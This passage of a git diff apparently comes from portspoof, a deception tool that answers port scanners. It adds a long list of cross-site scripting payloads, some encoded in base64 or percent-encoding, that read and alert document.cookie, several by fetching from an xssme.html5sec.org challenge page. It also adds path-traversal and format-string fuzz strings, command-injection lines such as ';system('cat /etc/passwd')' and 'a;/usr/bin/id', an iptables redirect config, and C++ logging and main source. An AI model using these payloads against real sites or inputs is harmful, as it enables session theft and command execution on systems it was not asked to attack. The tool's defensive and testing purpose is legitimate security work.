<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<%73%63%72%69%70%74>%20%64%20=%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22);%20%64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65));%20%61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65%20=%20'(%2e%2a%3f)'%22)[%31]);%20</%73%63%72%69%70%74>
|
||||
<script>%20var%20xdr%20=%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);%20%20xdr.open(%22get%22,%20%22/xssme2%3Fa=1%22,%20true);%20xdr.onreadystatechange%20=%20function()%20{%20try{%20%20%20var%20c;%20%20%20if%20(c=xdr.responseText.match(/document.cookie%20=%20'(.*%3F)'/)%20)%20%20%20%20alert(c[1]);%20}catch(e){}%20};%20%20xdr.send();%20</script>
|
||||
<iframe%20id=%22ifra%22%20src=%22/%22></iframe>%20<script>ifr%20=%20document.getElementById('ifra');%20ifr.contentDocument.write(%22<scr%22%20%2b%20%22ipt>top.foo%20=%20Object.defineProperty</scr%22%20%2b%20%22ipt>%22);%20foo(window,%20'Safe',%20{value:{}});%20foo(Safe,%20'get',%20{value:function()%20{%20%20%20%20return%20document.cookie%20}});%20alert(Safe.get());</script>
|
||||
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
||||
<script>alert(document.head.childNodes[3].text)</script>
|
||||
<script>var%20request%20=%20new%20XMLHttpRequest();request.open('GET',%20'http://html5sec.org/xssme2',%20false);request.send(null);if%20(request.status%20==%20200){alert(request.responseText.substr(150,41));}</script>
|
||||
<script>Object.defineProperty(window,%20'Safe',%20{value:{}});Object.defineProperty(Safe,%20'get',%20{value:function()%20{return%20document.cookie}});alert(Safe.get())</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return%20top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>
|
||||
<script>%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true});%20</script>
|
||||
<script>%20var+MouseEvent=function+MouseEvent(){};%20MouseEvent=MouseEvent%20var+test=new+MouseEvent();%20test.isTrusted=true;%20test.type='click';%20%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click(test);%20</script>
|
||||
<script>%20%20(function%20(o)%20{%20%20%20function%20exploit(x)%20{%20%20%20%20if%20(x%20!==%20null)%20%20%20%20%20alert('User%20cookie%20is%20'%20%2B%20x);%20%20%20%20else%20%20%20%20%20console.log('fail');%20%20%20}%20%20%20%20%20%20o.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__('isTrusted',%20function%20()%20{%20return%20true;%20});%20%20%20%20exploit(Safe.get());%20%20%20};%20%20%20%20%20%20var%20e%20=%20document.createEvent('MouseEvent');%20%20%20e.initEvent('click',%20true,%20true);%20%20%20o.dispatchEvent(e);%20%20})(document.getElementById('safe123'));%20</script>
|
||||
<iframe%20src=/%20onload=eval(unescape(this.name.replace(/\/g,null)))%20name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
||||
<script>%20%20%20%20%20function%20b()%20{%20return%20Safe.get();%20}%20alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true}));%20</script>%20
|
||||
<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=alert(this.ownerDocument.cookie)%20width=0%20height=%200%20/>%20#
|
||||
<script>%20%20function%20foo(elem,%20doc,%20text)%20{%20%20%20elem.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__(text[0],%20function%20()%20{%20return%20true%20})%20%20%20%20alert(Safe.get());%20%20%20};%20%20%20%20%20%20var%20event%20=%20doc.createEvent(text[1]);%20%20%20event.initEvent(text[2],%20true,%20true);%20%20%20elem.dispatchEvent(event);%20%20}%20</script>%20<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=foo(this,this.ownerDocument,this.name.split(/,/))%20name=isTrusted,MouseEvent,click%20width=0%20height=0%20/>%20#%20
|
||||
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
||||
<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>#
|
||||
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
||||
<script%20for=document%20event=onreadystatechange>getElementById('safe123').click()</script>
|
||||
<script>%20var+x+=+showModelessDialog+(this);%20alert(x.document.cookie);%20</script>
|
||||
<script>%20location.href%20=%20'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=';%20</script>
|
||||
<iframe%20src=%22404%22%20onload=%22frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22content.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22self.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22top.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<script>var%20x%20=%20safe123.onclick;safe123.onclick%20=%20function(event)%20{var%20f%20=%20false;var%20o%20=%20{%20isTrusted:%20true%20};var%20a%20=%20[event,%20o,%20event];var%20get;event.__defineGetter__('type',%20function()%20{get%20=%20arguments.callee.caller.arguments.callee;return%20'click';});var%20_alert%20=%20alert;alert%20=%20function()%20{%20alert%20=%20_alert%20};x.apply(null,%20a);(function()%20{arguments.__defineGetter__('0',%20function()%20{%20return%20a.pop();%20});alert(get());})();};safe123.click();</script>#
|
||||
<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<textarea%20id=ta%20onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;)%20autofocus></textarea>
|
||||
<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20id=iframe%20src=%22javascript:parent.x(window)%22><iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta%20onfocus=%22write('<script>alert(1)</script>')%22%20autofocus></textarea>
|
||||
<object%20data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
||||
<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20};%20open(%22javascript:opener.x(window)%22)</script>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
||||
<iframe%20src=`http://xssme.html5sec.org/?xss=<iframe%20onload=%22xhr=new%20XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
||||
<a%20target="x"%20href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
||||
<a%20target="x"%20href="xssme?xss=<script>var%20cl=Components;var%20fcc=String.fromCharCode;doc=cl.lookupMethod(top,%20fcc(100,111,99,117,109,101,110,116)%20)(%20);cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe%20src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b%20name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
||||
<a%20target="x"%20href="xssme?xss=<script>find('cookie');%20var%20doc%20=%20getSelection().getRangeAt(0).startContainer.ownerDocument;%20console.log(doc);%20var%20xpe%20=%20new%20XPathEvaluator();%20var%20nsResolver%20=%20xpe.createNSResolver(doc);%20var%20result%20=%20xpe.evaluate('//script/text()',%20doc,%20nsResolver,%200,%20null);%20alert(result.iterateNext().data.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<a%20target="x"%20href="xssme?xss=<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20src=%22javascript:parent.x(window);%22></iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'.',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
Garethy%20Salty%20Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(),%20'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
||||
<a%20href="javascript:\u0061le%72t(1)"><button>
|
||||
<div%20onmouseover='alert(1)'>DIV</div>
|
||||
<iframe%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20onmouseover="prompt(1)">
|
||||
<a%20href="jAvAsCrIpT:alert(1)">X</a>
|
||||
<embed%20src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">%20?
|
||||
<object%20data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
||||
<var%20onmouseover="prompt(1)">On%20Mouse%20Over</var>?
|
||||
<a%20href=javascript:alert(document.cookie)>Click%20Here</a>
|
||||
<img%20src="/"%20=_="%20title="onerror='prompt(1)'">
|
||||
<%<!--'%><script>alert(1);</script%20-->
|
||||
<script%20src="data:text/javascript,alert(1)"></script>
|
||||
<iframe/src%20\/\/onload%20=%20prompt(1)
|
||||
<iframe/onreadystatechange=alert(1)
|
||||
<svg/onload=alert(1)
|
||||
<input%20value=<><iframe/src=javascript:confirm(1)
|
||||
<input%20type="text"%20value=``<div/onmouseover='alert(1)'>X</div>
|
||||
http://www.<script>alert(1)</script%20.com
|
||||
<iframe%20%20src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>%20?
|
||||
<svg><script%20?>alert(1)
|
||||
<iframe%20%20src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
<img%20src=`xx:xx`onerror=alert(1)>
|
||||
<object%20type="text/x-scriptlet"%20data="http://jsfiddle.net/XLE63/%20"></object>
|
||||
<meta%20http-equiv="refresh"%20content="0;javascript:alert(1)"/>?
|
||||
<math><a%20xlink:href="//jsfiddle.net/t846h/">click
|
||||
<embed%20code="http://businessinfo.co.uk/labs/xss/xss.swf"%20allowscriptaccess=always>?
|
||||
<svg%20contentScriptType=text/vbs><script>MsgBox+1
|
||||
<a%20href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')%20worksinIE>
|
||||
<script>~'\u0061'%20;%20%20\u0074\u0068\u0072\u006F\u0077%20~%20\u0074\u0068\u0069\u0073.%20%20\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script%20U+
|
||||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script%20a=\u0061%20&%20/=%2F
|
||||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script%20????????????
|
||||
<object%20data=javascript:\u0061le%72t(1)>
|
||||
<script>+-+-1-+-+alert(1)</script>
|
||||
<body/onload=<!-->
alert(1)>
|
||||
<script%20itworksinallbrowsers>/*<script*%20*/alert(1)</script%20?
|
||||
<img%20src%20?itworksonchrome?\/onerror%20=%20alert(1)???
|
||||
<svg><script>//
confirm(1);</script%20</svg>
|
||||
<svg><script%20onlypossibleinopera:-)>%20alert(1)
|
||||
<a%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20%20aaaaaaaaa%20aaaaaaaaaa%20%20href=javascript:alert(1)>ClickMe
|
||||
<script%20x>%20alert(1)%20</script%201=2
|
||||
<div/onmouseover='alert(1)'>%20style="x:">
|
||||
<--`<img/src=`%20onerror=alert(1)>%20--!>
|
||||
<script/src=data:text/javascript,alert(1)></script>%20?
|
||||
<div%20%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20%20onmouseover="prompt(1)"%20onclick="alert(1)">x</button>?
|
||||
"><img%20src=x%20onerror=window.open('https://www.google.com/');>
|
||||
<form><button%20formaction=javascript:alert(1)>CLICKME
|
||||
<math><a%20xlink:href="//jsfiddle.net/t846h/">click
|
||||
<object%20data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
||||
<iframe%20%20src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
<a%20%20href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click%20%20Me</a>
|
||||
"><img%20src=x%20onerror=prompt(1);>
|
||||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
"><script>"
|
||||
">xxx<P>yyy
|
||||
"\t"
|
||||
#
|
||||
#'
|
||||
#'
|
||||
#xA
|
||||
#xA#xD
|
||||
#xD
|
||||
#xD#xA
|
||||
$NULL
|
||||
$null
|
||||
%
|
||||
%00
|
||||
%00/
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
%0a
|
||||
%20
|
||||
%20|
|
||||
%2500
|
||||
%250a
|
||||
%2A
|
||||
%2C
|
||||
%2e%2e%2f
|
||||
%3C%3F
|
||||
%5C
|
||||
%5C/
|
||||
%60
|
||||
%7C
|
||||
|
||||
|
||||
|
||||
|
||||
'
|
||||
";id"
|
||||
(')
|
||||
*
|
||||
*'
|
||||
*'
|
||||
*|
|
||||
+%00
|
||||
-
|
||||
--
|
||||
-1
|
||||
-1.0
|
||||
-2
|
||||
-20
|
||||
-268435455
|
||||
..%%35%63
|
||||
..%%35c
|
||||
..%25%35%63
|
||||
..%255c
|
||||
..%5c
|
||||
..%bg%qf
|
||||
..%c0%af
|
||||
..%u2215
|
||||
..%u2216
|
||||
../
|
||||
..\
|
||||
/
|
||||
/%00/
|
||||
/%2A
|
||||
/'
|
||||
/'
|
||||
0
|
||||
00
|
||||
0xfffffff
|
||||
1
|
||||
1.0
|
||||
2
|
||||
2147483647
|
||||
268435455
|
||||
65536
|
||||
;
|
||||
<%20%20script%20>%20<%20/%20script>
|
||||
<?
|
||||
?x=
|
||||
?x="
|
||||
?x=>
|
||||
?x=|
|
||||
@'
|
||||
@'
|
||||
A
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
FALSE
|
||||
NULL
|
||||
TRUE
|
||||
[']
|
||||
[']
|
||||
\
|
||||
\"blah
|
||||
\'
|
||||
\'
|
||||
\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
\0\0
|
||||
\0\0\0
|
||||
\\
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
\t
|
||||
^'
|
||||
^'
|
||||
`
|
||||
id%00
|
||||
id%00|
|
||||
null
|
||||
something%00html
|
||||
{'}
|
||||
{'}
|
||||
|
|
||||
}
|
29
src/src/fuzz_payloads_cmd_exec
Normal file
29
src/src/fuzz_payloads_cmd_exec
Normal file
@ -0,0 +1,29 @@
|
||||
a);id
|
||||
a;id
|
||||
a);id;
|
||||
a;id;
|
||||
a);id|
|
||||
a;id|
|
||||
a)|id
|
||||
a|id
|
||||
a)|id;
|
||||
a|id
|
||||
|/bin/ls -al
|
||||
a);/usr/bin/id
|
||||
a;/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a;/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a;/usr/bin/id|
|
||||
a)|/usr/bin/id
|
||||
a|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a|/usr/bin/id
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;system('/usr/bin/id')
|
||||
%0Acat%20/etc/passwd
|
||||
%0A/usr/bin/id
|
||||
%0Aid
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid%0A
|
21
src/src/ipt
Normal file
21
src/src/ipt
Normal file
@ -0,0 +1,21 @@
|
||||
# Generated by iptables-save v1.4.4 on Tue Apr 23 14:26:41 2013
|
||||
*nat
|
||||
:PREROUTING ACCEPT [5992:539002]
|
||||
:INPUT ACCEPT [347451:16935290]
|
||||
:OUTPUT ACCEPT [477:45868]
|
||||
:POSTROUTING ACCEPT [0:0]
|
||||
-A PREROUTING -i eth1 -p tcp -m tcp --dport 1:65535 -j REDIRECT --to-ports 4444
|
||||
-A PREROUTING -d 91.220.39.30/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.97.1:8080
|
||||
-A PREROUTING -d 91.220.39.30/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.97.1:8080
|
||||
-A POSTROUTING -j MASQUERADE
|
||||
-A POSTROUTING -o eth1 -j MASQUERADE
|
||||
COMMIT
|
||||
# Completed on Tue Apr 23 14:26:42 2013
|
||||
# Generated by iptables-save v1.4.4 on Tue Apr 23 14:26:42 2013
|
||||
*filter
|
||||
:INPUT ACCEPT [1931192:104113948]
|
||||
:FORWARD ACCEPT [0:0]
|
||||
:OUTPUT ACCEPT [1606583:151106362]
|
||||
-A FORWARD -j ACCEPT
|
||||
COMMIT
|
||||
# Completed on Tue Apr 23 14:26:42 2013
|
49
src/src/log.cpp
Normal file
49
src/src/log.cpp
Normal file
@ -0,0 +1,49 @@
|
||||
#include "log.h"
|
||||
#include <syslog.h>
|
||||
#include <pthread.h>
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
pthread_cond_t log_cond = PTHREAD_COND_INITIALIZER;
|
||||
pthread_mutex_t log_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
|
||||
|
||||
void log_create(const char* file){
|
||||
|
||||
FILE *fp = fopen(configuration->getLogFile().c_str(), "a");
|
||||
if (fp == NULL) {
|
||||
fp = fopen(configuration->getLogFile().c_str(), "w");
|
||||
}
|
||||
|
||||
fclose(fp);
|
||||
return;
|
||||
|
||||
}
|
||||
void log_write(const char* msg) {
|
||||
|
||||
pthread_mutex_lock(&log_mutex);
|
||||
|
||||
if(configuration->getConfigValue(OPT_LOG_FILE))
|
||||
{
|
||||
FILE *fp = fopen(configuration->getLogFile().c_str(), "a");
|
||||
if (fp == NULL) {
|
||||
fprintf(stdout,"Error opening file: %s \n",configuration->getLogFile().c_str());
|
||||
exit(1);
|
||||
}
|
||||
|
||||
fprintf(fp,"%s",msg);
|
||||
fclose(fp);
|
||||
|
||||
}
|
||||
|
||||
if(!(configuration->getConfigValue(OPT_SYSLOG_DIS)))
|
||||
{
|
||||
openlog("portspoof", LOG_PID|LOG_CONS, LOG_USER);
|
||||
syslog(LOG_INFO," %s",msg);
|
||||
closelog();
|
||||
}
|
||||
pthread_mutex_unlock(&log_mutex);
|
||||
|
||||
return;
|
||||
|
||||
}
|
8
src/src/log.h
Normal file
8
src/src/log.h
Normal file
@ -0,0 +1,8 @@
|
||||
#define MAX_LOG_MSG_LEN 200
|
||||
#include "Configuration.h"
|
||||
|
||||
class Configuration;
|
||||
extern Configuration* configuration;
|
||||
|
||||
void log_create(const char* file);
|
||||
void log_write(const char* msg);
|
0
src/src/log.txt
Normal file
0
src/src/log.txt
Normal file
149
src/src/main.cpp
Normal file
149
src/src/main.cpp
Normal file
@ -0,0 +1,149 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
|
||||
|
||||
#include <iostream>
|
||||
|
||||
using namespace std;
|
||||
|
||||
#include <sys/types.h>
|
||||
#include <pthread.h>
|
||||
#include <sys/timeb.h>
|
||||
#include <sys/wait.h>
|
||||
#include <err.h>
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <limits.h>
|
||||
#include <netdb.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <signal.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <unistd.h>
|
||||
#include <netinet/in.h>
|
||||
#include <net/if.h>
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <Windows.h>
|
||||
#include <winsock.h>
|
||||
|
||||
|
||||
|
||||
#include "Packets.h"
|
||||
#include "PacketsManager.h"
|
||||
#include "Configuration.h"
|
||||
|
||||
#define MAXBYTES2CAPTURE 1000
|
||||
|
||||
PacketsManager* packetsmanager;
|
||||
Configuration* configuration;
|
||||
|
||||
|
||||
void packet_callback(u_char *useless,const struct pcap_pkthdr* pkthdr,const u_char* packet)
|
||||
{
|
||||
struct ip *ip;
|
||||
struct tcphdr *tcp;
|
||||
int ip_len;
|
||||
unsigned int ip_addr;
|
||||
|
||||
ip = (struct ip*)(packet + sizeof(struct ether_header));
|
||||
